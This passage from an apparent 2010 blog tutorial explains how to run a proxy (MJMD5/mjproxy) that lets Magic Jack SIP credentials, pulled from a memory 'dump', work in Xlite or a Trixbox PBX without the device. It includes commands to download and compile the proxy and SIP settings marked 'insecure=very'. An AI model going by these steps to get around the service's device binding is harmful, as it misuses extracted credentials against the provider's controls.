{mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} @list l7:level2 	{mso-level-number-format:alpha-lower; 	mso-level-tab-stop:none; 	mso-level-number-position:left; 	text-indent:-.25in;} ol 	{margin-bottom:0in;} ul 	{margin-bottom:0in;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} --></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Start MJMD5.exe and fill in the proxy and the password field and press start:</p>
<p class="MsoListParagraphCxSpMiddle"><span><!--[if gte vml 1]><v:shapetype  id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"  path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f"> <v:stroke joinstyle="miter" /> <v:formulas> <v:f eqn="if lineDrawn pixelLineWidth 0" /> <v:f eqn="sum @0 1 0" /> <v:f eqn="sum 0 0 @1" /> <v:f eqn="prod @2 1 2" /> <v:f eqn="prod @3 21600 pixelWidth" /> <v:f eqn="prod @3 21600 pixelHeight" /> <v:f eqn="sum @0 0 1" /> <v:f eqn="prod @6 1 2" /> <v:f eqn="prod @7 21600 pixelWidth" /> <v:f eqn="sum @8 21600 0" /> <v:f eqn="prod @7 21600 pixelHeight" /> <v:f eqn="sum @10 21600 0" /> </v:formulas> <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect" /> <o:lock v:ext="edit" aspectratio="t" /> </v:shapetype><v:shape id="Picture_x0020_10" o:spid="_x0000_i1033" type="#_x0000_t75"  alt="proxymd5.jpg" style='width:236.25pt;height:169.5pt;visibility:visible;  mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image001.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image001.jpg"   o:title="proxymd5" /> </v:shape><![endif]--></span></p>
<p class="MsoListParagraphCxSpMiddle"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/proxymd5.jpg"><img class="aligncenter size-medium wp-image-150" title="proxymd5" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/proxymd5-300x215.jpg" alt="" width="300" height="215" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Now that the proxy is running, let’s open our Xlite soft phone application and add a new SIP Account. To do this launch the application and right click on the status window &#8211;&gt; Choose SIP account settings &#8211;&gt;<span style="font-family: Wingdings;"><span> </span></span>Add. Display Name: Can be anything you want. User Name: Must be your SIP user name. Password: must be the password that we got from the dump. Authorization user name: must be the SIP user name. Domain: is the IP address of the computer you are running the MJMD5 proxy on :5070 (The SIP Port). To get the IP of your machine go to a command prompt and type ipconfig and press enter. Make sure the rest of the settings are checked as you see in the image below. Then hit save and go back to the application.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xlitesip.jpg" target="_blank"><img class="aligncenter size-medium wp-image-151" title="xlitesip" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xlitesip-299x220.jpg" alt="" width="299" height="220" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_11" o:spid="_x0000_i1032" type="#_x0000_t75" alt="xlite config.jpg"  style='width:335.25pt;height:246.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image002.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image002.jpg"   o:title="xlite config" /> </v:shape><![endif]--></span><strong> </strong></p>
<p class="MsoListParagraphCxSpMiddle"><strong> </strong></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span><strong><span style="color: red;">The moment of truth: </span></strong>If you have followed all the directions above and got the correct proxy, password and username you should see the following displayed on the Xlite soft phone and you should be able to place a call without the Magic Jack plugged in.</p>
<p class="MsoListParagraphCxSpMiddle"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_12" o:spid="_x0000_i1031" type="#_x0000_t75" alt="xliteuser.jpg"  style='width:164.25pt;height:257.25pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image004.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image004.jpg"   o:title="xliteuser" /> </v:shape><![endif]--></span></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteuser.jpg" target="_blank"><img class="aligncenter size-medium wp-image-152" title="xliteuser" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteuser-191x300.jpg" alt="" width="191" height="300" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Testing outbound call</p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteout.jpg" target="_blank"><img class="aligncenter size-medium wp-image-153" title="xliteout" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteout-201x300.jpg" alt="" width="201" height="300" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_14" o:spid="_x0000_i1030" type="#_x0000_t75" alt="xliteout.jpg"  style='width:160.5pt;height:239.25pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image006.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image006.jpg"   o:title="xliteout" /> </v:shape><![endif]--></span></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Testing incoming calls</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteincome.jpg" target="_blank"><img class="aligncenter size-medium wp-image-154" title="xliteincome" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/xliteincome-199x300.jpg" alt="" width="199" height="300" /></a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px; text-align: center;">Click for a larger image</p>
<p class="MsoListParagraphCxSpMiddle"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_13" o:spid="_x0000_i1029" type="#_x0000_t75" alt="xliteincome.jpg"  style='width:160.5pt;height:240.75pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image008.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image008.jpg"   o:title="xliteincome" /> </v:shape><![endif]--></span></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Now that we know that the SIP information we gathered is correct, we can use it for countless things.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;"><span><span>a.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>For example you can use a service like <a href="http://www.afraid.org/">http://www.afraid.org</a> to register a sub domain for free that points to your home IP address. On your home firewall you can setup a rule to allow 5070 inbound and create a network address translation. This will allow you to use any wireless device with a SIP client to connect to your home computer running the MJMD5 proxy and make free calls.</p>
<p class="MsoListParagraphCxSpLast" style="margin-left: 1in; text-indent: -0.25in;"><span><span>b.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Or you can setup your own PBX, like Trixbox</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Setting up your own PBX using Trixbox</span></strong></p>
<p class="MsoNormal">This section requires that you have knowledge of the Linux operating system or are willing to spend the time to learn as you go. If this is you then please continue on.</p>
<p class="MsoNormal">Before you start you will need a copy of Trixbox installed and ready to go. To obtain an ISO of Trixbox go to <a href="http://www.trixbox.org/downloads">http://www.trixbox.org/downloads</a> and download it. Once it is done downloading burn the ISO to CD and install. Trixbox should be installed on a system with a minimum hardware of 40gig hard drive, 512 MB of memory and a network card. This configuration should support a small office or home setup.</p>
<p class="MsoNormal">During the creation of trunks, routes and extensions if I do not mention a field you are to leave the default value unless you want to play with settings at which point you are on your own for making this work.</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;"><span style="text-decoration: none;"> </span></span></strong></p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Installing MJProxy:</span></strong></p>
<p class="MsoNormal">MJProxy is a program written in c to manipulate your SIP traffic into the Magic Jack required format and pass it to and from the Magic Jack servers and your PBX.</p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Login as root to your Tribox system</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Install the c compiler: yum –y install gcc</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Download mjproxy source: wget <a href="../mjproxy.c.tar.gz">http://www.digitaloffensive.com/mjproxy.c.tar.gz</a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Extract the mjproxy source and libraries: tar –zxvf mjproxy.c.tar.gz</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Compile the mjproxy source to an executable: gcc -o mjproxy md5.c mjproxy.c</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Give it rights to run and execute: chmod 777 mjproxy</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>7.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Run the mjproxy: ./mjproxy 0.0.0.0 5070 proxy01.yoursite.talk4free.com 5070 your_password</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;"><span><span>a.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>To run multiple Magic Jacks you can either use a virtual IP on your interface or replace the 0.0.0.0 with a dedicated IP. The 0.0.0.0 means to listen on all IP’s. Or you can change the first instance of 5070 to the next highest number i.e. 5071. I would suggest a combination of both as to not to confuse inbound and outbound calls.</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;"><span><span>b.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>You can also place this as a service or create a shell script to execute all your Magic Jack proxies.</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>8.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Issue a ps –wuax to make sure the mjproxy process is running</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Logging into Trixbox web gui:</span></strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Login to the web gui <a href="http://ip_address/">http://IP_address</a> of your Trixbox install and click switch in the upper right hand cornor. This will switch you from user mode to maintaince mode. By default the login is maint / password. To change this log into the console with the root account and issue the command passwd-maint and follow the instructions.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Once logged in either fill out or ignore the Trixbox registration screen. This is not required but can’t hurt.</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>At this point you can start your configuration.</p>
<p class="MsoNormal"><strong><span style="text-decoration: underline;">Update your system:</span></strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on PBX settings</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>On the left hand side click “Module admin”.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Check for updates online”.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Upgrade all”.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Download all”.</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Then ok, this will start the downloads, the upgrades and will then prompt to reload the system.</p>
<p class="MsoNormal"><strong>Configuring a Trixbox Trunk:</strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “PBX Settings”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Trunks”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Choose “Add a SIP Trunk”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Leave “General Settings” blank</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>5.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under “Outgoing Settings” fill out the following</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in; padding-left: 30px;"><span><span>a.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Trunk Name: Magic Jack (or anything you want)</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in; padding-left: 30px;"><span><span>b.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Peer details:</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">username=EXXXXXXXXXX01 (your SIP username)</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">type=friend</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">secret=LXXXXXXXXXXXXXXX (Your SIP Password)</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">qualify=2000</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">port=5070</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">nat=no</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">host=XXX.XXX.XXX.XXX (The IP address of your trixbox)</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">fromuser= EXXXXXXXXXX01 (your SIP username)</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">dtmfmode=inband</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">insecure=very</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1.5in;">context=from-pstn</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>6.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under Incoming settings erase everything out of the fields.</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>7.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Under registration fill it in as follows with the information from the Peer Details:</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;"><span><span>a.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>SIP username:SIP password@Trixbox IP:5070/Your 10 digit telephone number</p>
<p class="MsoListParagraphCxSpMiddle" style="margin-left: 1in; text-indent: -0.25in;"><span><span>b.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Ex. EXXXXXXXXXX01: <a href="mailto:LXXXXXXXXXXXXXXX@xxx.xxx.xxx.xxx:5070/7175555555">LXXXXXXXXXXXXXXX@xxx.xxx.xxx.xxx:5070/7175555555</a></p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>8.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Submit changes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>9.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Apply changes”</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px;"><span><span>10.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “reload”</p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-gen.jpg" target="_blank"><img class="aligncenter size-medium wp-image-155" title="trunk-gen" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-gen-266x300.jpg" alt="" width="266" height="300" /></a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-out.jpg" target="_blank"></a></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><span style="color: #000000;">Click for a larger image</span><strong><span style="color: red;"><br />
</span></strong></p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-out.jpg" target="_blank"><img class="aligncenter size-medium wp-image-156" title="trunk-out" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-out-300x225.jpg" alt="" width="300" height="225" /></a><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-user-reg.jpg" target="_blank"></a></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><span style="color: #000000;">Click for a larger image</span><strong><span style="color: red;"><br />
</span></strong></p>
<p class="MsoListParagraphCxSpLast" style="text-indent: -0.25in; padding-left: 30px; text-align: center;"><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-user-reg.jpg" target="_blank"><img class="aligncenter size-medium wp-image-157" title="trunk-user-reg" src="http://www.digitaloffensive.com/wp-content/uploads/2010/03/trunk-user-reg-254x300.jpg" alt="" width="254" height="300" /></a></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; text-align: center;"><span style="color: #000000;">Click for a larger image</span><strong><span style="color: red;"><br />
</span></strong></p>
<p class="MsoNormal"><span><!--[if gte vml 1]><v:shape  id="Picture_x0020_16" o:spid="_x0000_i1028" type="#_x0000_t75" alt="trunk-gen.jpg"  style='width:276.75pt;height:311.25pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image010.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image010.jpg"   o:title="trunk-gen" /> </v:shape><![endif]--><!--[if gte vml 1]><v:shape  id="Picture_x0020_17" o:spid="_x0000_i1027" type="#_x0000_t75" alt="trunk-out.jpg"  style='width:277.5pt;height:208.5pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image011.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image011.jpg"   o:title="trunk-out" /> </v:shape><![endif]--><!--[if gte vml 1]><v:shape  id="Picture_x0020_18" o:spid="_x0000_i1026" type="#_x0000_t75" alt="trunk-user-reg.jpg"  style='width:286.5pt;height:337.5pt;visibility:visible;mso-wrap-style:square'> <v:imagedata src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image012.jpg" mce_src="file:///C:\DOCUME~1\milasalv\LOCALS~1\Temp\msohtmlclip1\01\clip_image012.jpg"   o:title="trunk-user-reg" /> </v:shape><![endif]--></span></p>
<p class="MsoNormal">When you click on the PBX settings button you will see the following if you created the trunk correctly and if it registered:</p>
<p class="MsoNormal">IP Trunks Online<span> </span>1</p>
<p class="MsoNormal">IP Trunk Registrations<span> </span><span> </span>1</p>
<p class="MsoNormal">If this did not work you can use tail –f<span> </span>10 /var/log/asterisk/full on the command line to view your logs for errors. If you did not test your SIP settings as I outlined above please go back and use xlite to verify they are correct then try rebuilding the trunk again. If you are still having issues I am available for a hourly rate to trouble shoot and correct or you can use Google.</p>
<p class="MsoNormal"><strong>Creating an outbound route:</strong></p>
<p class="MsoListParagraphCxSpFirst" style="text-indent: -0.25in; padding-left: 30px;"><span><span>1.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “PBX Settings”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>2.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click on “Outbound Routes”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>3.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Click “Add route”</p>
<p class="MsoListParagraphCxSpMiddle" style="text-indent: -0.25in; padding-left: 30px;"><span><span>4.<span style="font-family: &amp;amp;amp; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span>Route Name: Magic-out (Or whatever you want to name it)</p>
